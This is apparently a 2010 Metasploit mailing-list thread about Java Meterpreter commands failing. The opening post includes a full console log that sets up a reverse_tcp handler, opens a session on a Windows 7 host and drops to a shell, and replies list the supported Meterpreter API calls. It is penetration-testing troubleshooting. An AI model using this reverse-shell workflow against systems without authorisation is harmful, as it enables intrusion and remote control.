Re: Meterpreter commands failing

[Matthew Presson <matthew.presson () gmail com>]

Thanks all.  As for the privileges of the compromised user, they were
an admin on the system.  For future reference, I have also seen this
fail on HP-UX systems.

Thanks again for all the answers.


--matt

On 10/19/10, Carlos Perez <carlos_perez () darkoperator com> wrote:
> I would say it depends on the case and target, for instance I can run the
> Java Meterpreter on OSX, Windows and Linux, also it does provide the
> flexibility of working better as a payload for certain attacks. Right now
> you can script it with the multicommand and multi_console_command to
> automate post exploitation. Right now upload_exec is written to use the
> client.fs.file.expand_path, that is the only limitation right now for that
> script.
>
> Cheers,
> Carlos
>
> On Oct 19, 2010, at 6:04 AM, Miguel Rios wrote:
>
> > I'd say that the java payload is of limited use if one cannot have it run
> > a script like uploadexec. Still early stages I guess but I usually disable
> > the java payloads on tools like browser_autopwn precisely because of their
> > limitations. Hopefully they'll become more robust and versatile in the
> > future.
> >
> > --- On Tue, 10/19/10, Carlos Perez <carlos_perez () darkoperator com> wrote:
> >
> > From: Carlos Perez <carlos_perez () darkoperator com>
> > Subject: Re: [framework] Meterpreter commands failing
> > To: "Tasos Laskos" <tasos.laskos () gmail com>
> > Cc: framework () spool metasploit com
> > Date: Tuesday, October 19, 2010, 2:09 AM
> >
> > Each version of meterpreter have their own list of supported commands, for
> > example the API Calls  supported for the PHP versions
> >
> > stdapi_fs_expand_path
> > stdapi_fs_chdir
> > stdapi_fs_delete
> > stdapi_fs_getwd
> > stdapi_fs_ls
> > stdapi_fs_stat
> > stdapi_fs_delete_file
> > stdapi_sys_config_getuid
> > stdapi_sys_config_rev2self
> > stdapi_sys_config_sysinfo
> > stdapi_sys_process_execute
> > stdapi_sys_process_get_processes
> > stdapi_sys_process_getpid
> > stdapi_sys_process_kill
> > stdapi_net_socket_tcp_shutdown
> > channel_create_stdapi_fs_file
> > channel_create_stdapi_net_tcp_client
> > channel_create_stdapi_net_udp_client
> > core_channel_open
> > core_channel_eof
> > core_channel_read
> > core_channel_write
> > core_channel_close
> > core_channel_interact
> > core_loadlib
> >
> > for Java if you look at:
> > http://www.metasploit.com/redmine/projects/framework/repository/show/external/source/meterpreter/java/src/stdapi/com/metasploit/meterpreter/stdapi
> >
> > you will see the calls supported, there are plans to have the menu only
> > show those entries supported for a future release.
> >
> > Regards,
> > Carlos
> >
> > On Oct 18, 2010, at 9:52 PM, Tasos Laskos wrote:
> >
> > > My guess is lack of necessary privileges on the exploited system.
> > > The same thing happens with all meterpreter payloads.
> > >
> > > - Tasos
> > >
> > >
> > > On 19/10/10 02:46, Matthew Presson wrote:
> > > > When trying to run some meterpreter commands (use priv, ps, getpid, etc)
> > > > they fail with "Operation failed" messages.  Here is some of the output
> > > > from the session.
> > > >
> > > >       =[ metasploit v3.5.0-dev [core:3.5 api:1.0]
> > > > + -- --=[ 612 exploits - 306 auxiliary
> > > > + -- --=[ 215 payloads - 27 encoders - 8 nops
> > > >       =[ svn r10741 updated today (2010.10.19)
> > > >
> > > >
> > > > msf > use multi/handler
> > > > msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
> > > > PAYLOAD => java/meterpreter/reverse_tcp
> > > > msf exploit(handler) > set LHOST 192.168.1.10
> > > > LHOST => 192.168.1.10
> > > > msf exploit(handler) > exploit
> > > >
> > > > [*] Started reverse handler on 192.168.1.10:4444
> > > > <http://192.168.1.10:4444>
> > > > [*] Starting the payload handler...
> > > > ^C[-] Exploit exception: Interrupt
> > > > [*] Exploit completed, but no session was created.
> > > > msf exploit(handler) > exploit
> > > >
> > > > [*] Started reverse handler on 192.168.1.10:4444
> > > > <http://192.168.1.10:4444>
> > > > [*] Starting the payload handler...
> > > > [*] Sending stage (26938 bytes) to 192.168.1.4
> > > > [*] Meterpreter session 1 opened (192.168.1.10:4444
> > > > <http://192.168.1.10:4444> -> 192.168.1.4:3022
> > > > <http://192.168.1.4:3022>) at 2010-10-18 20:34:16 -0500
> > > >
> > > >
> > > > meterpreter > use priv
> > > > Loading extension priv...
> > > > [-] Failed to load extension: No such file or directory -
> > > > /opt/metasploit3/msf3/data/meterpreter/ext_server_priv.jar
> > > > meterpreter > getpid
> > > > [-] stdapi_sys_process_getpid: Operation failed:
> > > > meterpreter > ps
> > > > [-] stdapi_sys_process_get_processes: Operation failed:
> > > > meterpreter > getprivs
> > > > ============================================================
> > > > Enabled Process Privileges
> > > > ============================================================
> > > > [-] stdapi_sys_config_getprivs: Operation failed:
> > > > meterpreter > sysinfo
> > > > Computer: Windows7
> > > > OS      : Windows 7 6.1 (x86)
> > > > meterpreter > getuid
> > > > Server username: AdminUser
> > > > meterpreter > shell
> > > > Process 1 created.
> > > > Channel 1 created.
> > > > Microsoft Windows [Version 6.1.7600]
> > > > Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
> > > >
> > > > C:\Users\AdminUser\Desktop>
> > > >
> > > >
> > > > Am I doing something wrong, or are these limitations a product of the
> > > > java/meterpreter payload?
> > > >
> > > > --
> > > > Matt
> > > >
> > > >
> > > > _______________________________________________
> > > > https://mail.metasploit.com/mailman/listinfo/framework
> > >
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
> >
> >
> > -----Inline Attachment Follows-----
> >
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework

-- 
Sent from my mobile device

Matt
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework